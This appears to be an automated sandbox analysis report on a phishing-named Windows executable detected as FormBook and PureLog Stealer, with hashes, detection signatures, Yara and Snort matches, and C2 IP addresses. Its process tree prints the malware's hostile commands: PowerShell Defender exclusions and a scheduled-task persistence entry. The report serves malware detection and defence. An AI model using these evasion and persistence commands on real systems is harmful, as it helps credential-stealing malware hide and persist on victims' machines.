Windows Analysis Report
BANK DETAILS CORRECTIONS.exe

Overview

General Information

Sample name: BANK DETAILS CORRECTIONS.exe
Analysis ID: 1411001
MD5: 6b3d6565f98f00436cf229258a5ac2c8
SHA1: 6fd6b3e765c4e2d6c262e48f3da8040f2f72e41c
SHA256: d48e76a16a20d4af37091f9dea89ce3fa2341e273a3898ac1b8b398c2a5793d5
Tags: exe

Detection

FormBook, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • BANK DETAILS CORRECTIONS.exe (PID: 7616 cmdline: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe MD5: 6B3D6565F98F00436CF229258A5AC2C8)
    • powershell.exe (PID: 7864 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7932 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7284 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7964 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fcLfLlfpmjf" /XML "C:\Users\user\AppData\Local\Temp\tmpB1A6.tmp MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 8032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • BANK DETAILS CORRECTIONS.exe (PID: 8160 cmdline: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe MD5: 6B3D6565F98F00436CF229258A5AC2C8)
      • EnKifmZDGZ.exe (PID: 5736 cmdline: "C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • sdiagnhost.exe (PID: 7656 cmdline: C:\Windows\SysWOW64\sdiagnhost.exe MD5: 76676F0A21E6AF109845151B3CEFE211)
          • EnKifmZDGZ.exe (PID: 6128 cmdline: "C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6348 cmdline: C:\Program Files\Mozilla Firefox\Firefox.exe MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • fcLfLlfpmjf.exe (PID: 7212 cmdline: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe MD5: 6B3D6565F98F00436CF229258A5AC2C8)
    • schtasks.exe (PID: 8140 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fcLfLlfpmjf" /XML "C:\Users\user\AppData\Local\Temp\tmpC983.tmp MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 8172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • fcLfLlfpmjf.exe (PID: 7872 cmdline: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe MD5: 6B3D6565F98F00436CF229258A5AC2C8)
      • EnKifmZDGZ.exe (PID: 1992 cmdline: "C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • sdiagnhost.exe (PID: 7628 cmdline: C:\Windows\SysWOW64\sdiagnhost.exe MD5: 76676F0A21E6AF109845151B3CEFE211)
  • cleanup
No configs have been found

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| 00000015.00000002.3734033514.00000000028F0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |
| 00000015.00000002.3734033514.00000000028F0000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown | 0x2b0a0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55; 0x152df:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 |
| 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |
| 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown | 0x2e6a3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55; 0x188e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 |
| 00000019.00000002.3736975919.0000000005360000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| 13.2.fcLfLlfpmjf.exe.28a731c.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |
| 13.2.fcLfLlfpmjf.exe.28a731c.0.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |
| 0.2.BANK DETAILS CORRECTIONS.exe.2dd733c.1.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |
| 12.2.BANK DETAILS CORRECTIONS.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |
| 12.2.BANK DETAILS CORRECTIONS.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown | 0x2e6a3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55; 0x188e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 |

                System Summary

                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, ParentImage: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, ParentProcessId: 7616, ParentProcessName: BANK DETAILS CORRECTIONS.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, ProcessId: 7864, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fcLfLlfpmjf" /XML "C:\Users\user\AppData\Local\Temp\tmpC983.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fcLfLlfpmjf" /XML "C:\Users\user\AppData\Local\Temp\tmpC983.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe, ParentImage: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe, ParentProcessId: 7212, ParentProcessName: fcLfLlfpmjf.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fcLfLlfpmjf" /XML "C:\Users\user\AppData\Local\Temp\tmpC983.tmp, ProcessId: 8140, ProcessName: schtasks.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fcLfLlfpmjf" /XML "C:\Users\user\AppData\Local\Temp\tmpB1A6.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fcLfLlfpmjf" /XML "C:\Users\user\AppData\Local\Temp\tmpB1A6.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, ParentImage: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, ParentProcessId: 7616, ParentProcessName: BANK DETAILS CORRECTIONS.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fcLfLlfpmjf" /XML "C:\Users\user\AppData\Local\Temp\tmpB1A6.tmp, ProcessId: 7964, ProcessName: schtasks.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, ParentImage: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, ParentProcessId: 7616, ParentProcessName: BANK DETAILS CORRECTIONS.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, ProcessId: 7864, ProcessName: powershell.exe

                Persistence and Installation Behavior

                Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fcLfLlfpmjf" /XML "C:\Users\user\AppData\Local\Temp\tmpB1A6.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fcLfLlfpmjf" /XML "C:\Users\user\AppData\Local\Temp\tmpB1A6.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, ParentImage: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, ParentProcessId: 7616, ParentProcessName: BANK DETAILS CORRECTIONS.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fcLfLlfpmjf" /XML "C:\Users\user\AppData\Local\Temp\tmpB1A6.tmp, ProcessId: 7964, ProcessName: schtasks.exe

| Timestamp | SID | Source Port | Destination Port | Protocol | Classtype |
|---|---|---|---|---|---|
| 03/18/24-14:49:23.116360 | 2855465 | 49764 | 80 | TCP | A Network Trojan was detected |
| 03/18/24-14:47:24.864581 | 2855464 | 49734 | 80 | TCP | A Network Trojan was detected |
| 03/18/24-14:47:45.037863 | 2855465 | 49740 | 80 | TCP | A Network Trojan was detected |
| 03/18/24-14:49:15.008940 | 2855464 | 49761 | 80 | TCP | A Network Trojan was detected |
| 03/18/24-14:49:00.929117 | 2855464 | 49757 | 80 | TCP | A Network Trojan was detected |
| 03/18/24-14:47:36.204871 | 2855464 | 49737 | 80 | TCP | A Network Trojan was detected |
| 03/18/24-14:46:47.390741 | 2855465 | 49724 | 80 | TCP | A Network Trojan was detected |
| 03/18/24-14:48:41.640265 | 2855465 | 49756 | 80 | TCP | A Network Trojan was detected |
| 03/18/24-14:46:38.541470 | 2855464 | 49721 | 80 | TCP | A Network Trojan was detected |
| 03/18/24-14:48:07.754865 | 2855464 | 49746 | 80 | TCP | A Network Trojan was detected |
| 03/18/24-14:48:22.873091 | 2855464 | 49750 | 80 | TCP | A Network Trojan was detected |
| 03/18/24-14:47:15.585177 | 2855465 | 49732 | 80 | TCP | A Network Trojan was detected |
| 03/18/24-14:46:41.234545 | 2855464 | 49722 | 80 | TCP | A Network Trojan was detected |
| 03/18/24-14:47:30.526801 | 2855465 | 49736 | 80 | TCP | A Network Trojan was detected |
| 03/18/24-14:48:36.357367 | 2855464 | 49754 | 80 | TCP | A Network Trojan was detected |
| 03/18/24-14:47:22.032780 | 2855464 | 49733 | 80 | TCP | A Network Trojan was detected |
| 03/18/24-14:47:53.290655 | 2855464 | 49742 | 80 | TCP | A Network Trojan was detected |
| 03/18/24-14:46:06.415073 | 2855465 | 49715 | 80 | TCP | A Network Trojan was detected |
| 03/18/24-14:46:26.987706 | 2855464 | 49717 | 80 | TCP | A Network Trojan was detected |
| 03/18/24-14:48:28.230214 | 2855465 | 49752 | 80 | TCP | A Network Trojan was detected |
| 03/18/24-14:49:17.708078 | 2855464 | 49762 | 80 | TCP | A Network Trojan was detected |
| 03/18/24-14:47:39.612848 | 2855464 | 49738 | 80 | TCP | A Network Trojan was detected |
| 03/18/24-14:48:14.519924 | 2855465 | 49748 | 80 | TCP | A Network Trojan was detected |
| 03/18/24-14:48:05.006691 | 2855464 | 49745 | 80 | TCP | A Network Trojan was detected |
| 03/18/24-14:47:59.248907 | 2855465 | 49744 | 80 | TCP | A Network Trojan was detected |
| 03/18/24-14:48:20.193872 | 2855464 | 49749 | 80 | TCP | A Network Trojan was detected |
| 03/18/24-14:46:52.992602 | 2855464 | 49725 | 80 | TCP | A Network Trojan was detected |
| 03/18/24-14:46:32.650841 | 2855465 | 49719 | 80 | TCP | A Network Trojan was detected |
| 03/18/24-14:47:02.369576 | 2855465 | 49728 | 80 | TCP | A Network Trojan was detected |
| 03/18/24-14:46:23.153101 | 2855464 | 49716 | 80 | TCP | A Network Trojan was detected |
| 03/18/24-14:49:03.754472 | 2855464 | 49758 | 80 | TCP | A Network Trojan was detected |
| 03/18/24-14:46:55.688066 | 2855464 | 49726 | 80 | TCP | A Network Trojan was detected |
| 03/18/24-14:47:07.758224 | 2855464 | 49729 | 80 | TCP | A Network Trojan was detected |
| 03/18/24-14:49:09.406211 | 2855465 | 49760 | 80 | TCP | A Network Trojan was detected |
| 03/18/24-14:47:50.648512 | 2855464 | 49741 | 80 | TCP | A Network Trojan was detected |
| 03/18/24-14:48:33.723190 | 2855464 | 49753 | 80 | TCP | A Network Trojan was detected |
| 03/18/24-14:47:10.366529 | 2855464 | 49730 | 80 | TCP | A Network Trojan was detected |

                AV Detection

                Source: http://www.nikazo.xyz/e6xn/, Avira URL Cloud: Label: phishing
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe, ReversingLabs: Detection: 71%
                Source: BANK DETAILS CORRECTIONS.exe, ReversingLabs: Detection: 71%
                Source: Yara match, File source: 12.2.BANK DETAILS CORRECTIONS.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 12.2.BANK DETAILS CORRECTIONS.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000015.00000002.3734033514.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000019.00000002.3736975919.0000000005360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000C.00000002.1418327028.0000000001860000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000015.00000002.3731748977.0000000002320000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000018.00000002.1517319906.0000000002900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000015.00000002.3733947362.00000000028B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000014.00000002.1513647922.00000000019A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000011.00000002.3733999861.0000000003690000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000016.00000002.3734431266.0000000002C30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000C.00000002.1420663413.0000000002880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe, Joe Sandbox ML: detected
                Source: BANK DETAILS CORRECTIONS.exe, Joe Sandbox ML: detected
                Source: BANK DETAILS CORRECTIONS.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: BANK DETAILS CORRECTIONS.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: firefox.pdbP source: sdiagnhost.exe, 00000015.00000003.1678729235.0000000007E26000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: EnKifmZDGZ.exe, 00000011.00000002.3731777625.00000000001CE000.00000002.00000001.01000000.0000000D.sdmp, EnKifmZDGZ.exe, 00000016.00000000.1383056576.00000000001CE000.00000002.00000001.01000000.0000000D.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3731787865.00000000001CE000.00000002.00000001.01000000.0000000D.sdmp
                Source: Binary string: wntdll.pdbUGP source: BANK DETAILS CORRECTIONS.exe, 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3734603384.00000000045DE000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000003.1420258806.0000000004297000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000003.1415103726.00000000040E0000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3734603384.0000000004440000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000018.00000002.1517559243.0000000004A50000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000018.00000003.1512263789.00000000048A4000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000018.00000003.1510099441.00000000046FB000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000018.00000002.1517559243.0000000004BEE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: hBWP.pdbSHA256 source: BANK DETAILS CORRECTIONS.exe, fcLfLlfpmjf.exe.0.dr
                Source: Binary string: wntdll.pdb source: BANK DETAILS CORRECTIONS.exe, BANK DETAILS CORRECTIONS.exe, 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3734603384.00000000045DE000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000003.1420258806.0000000004297000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000003.1415103726.00000000040E0000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3734603384.0000000004440000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000018.00000002.1517559243.0000000004A50000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000018.00000003.1512263789.00000000048A4000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000018.00000003.1510099441.00000000046FB000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000018.00000002.1517559243.0000000004BEE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: sdiagnhost.pdb source: BANK DETAILS CORRECTIONS.exe, 0000000C.00000002.1416407629.00000000013C8000.00000004.00000020.00020000.00000000.sdmp, EnKifmZDGZ.exe, 00000011.00000002.3733392609.00000000010F7000.00000004.00000020.00020000.00000000.sdmp, fcLfLlfpmjf.exe, 00000014.00000002.1510220095.0000000001088000.00000004.00000020.00020000.00000000.sdmp, EnKifmZDGZ.exe, 00000016.00000002.3733440957.0000000000EE7000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: hBWP.pdb source: BANK DETAILS CORRECTIONS.exe, fcLfLlfpmjf.exe.0.dr
                Source: Binary string: firefox.pdb source: sdiagnhost.exe, 00000015.00000003.1678729235.0000000007E26000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: sdiagnhost.pdbGCTL source: BANK DETAILS CORRECTIONS.exe, 0000000C.00000002.1416407629.00000000013C8000.00000004.00000020.00020000.00000000.sdmp, EnKifmZDGZ.exe, 00000011.00000002.3733392609.00000000010F7000.00000004.00000020.00020000.00000000.sdmp, fcLfLlfpmjf.exe, 00000014.00000002.1510220095.0000000001088000.00000004.00000020.00020000.00000000.sdmp, EnKifmZDGZ.exe, 00000016.00000002.3733440957.0000000000EE7000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, Code function: 4x nop then jmp 076DBD8Dh, 0_2_076DB423
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe, Code function: 4x nop then jmp 06F8B065h, 13_2_06F8A6FB

                Networking

                Source: Traffic, Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.10:49715 -> 149.88.64.51:80
                Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49716 -> 47.76.88.64:80
                Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49717 -> 47.76.88.64:80
                Source: Traffic, Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.10:49719 -> 47.76.88.64:80
                Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49721 -> 144.76.75.181:80
                Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49722 -> 144.76.75.181:80
                Source: Traffic, Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.10:49724 -> 144.76.75.181:80
                Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49725 -> 64.190.62.22:80
                Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49726 -> 64.190.62.22:80
                Source: Traffic, Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.10:49728 -> 64.190.62.22:80
                Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49729 -> 104.21.63.135:80
                Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49730 -> 104.21.63.135:80
                Source: Traffic, Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.10:49732 -> 104.21.63.135:80
                Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49733 -> 49.0.230.183:80
                Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49734 -> 49.0.230.183:80
                Source: Traffic, Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.10:49736 -> 49.0.230.183:80
                Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49737 -> 66.29.152.141:80
                Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49738 -> 66.29.152.141:80
                Source: Traffic, Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.10:49740 -> 66.29.152.141:80
                Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49741 -> 192.64.119.184:80
                Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49742 -> 192.64.119.184:80
                Source: Traffic, Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.10:49744 -> 192.64.119.184:80
                Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49745 -> 87.236.19.107:80
                Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49746 -> 87.236.19.107:80
                Source: Traffic, Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.10:49748 -> 87.236.19.107:80
                Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49749 -> 154.7.21.55:80
                Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49750 -> 154.7.21.55:80
                Source: Traffic, Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.10:49752 -> 154.7.21.55:80
                Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49753 -> 50.6.160.34:80
                Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49754 -> 50.6.160.34:80
                Source: Traffic, Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.10:49756 -> 50.6.160.34:80
                Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49757 -> 103.197.25.241:80
                Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49758 -> 103.197.25.241:80
                Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.10:49760 -> 103.197.25.241:80
                Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49761 -> 89.31.143.90:80
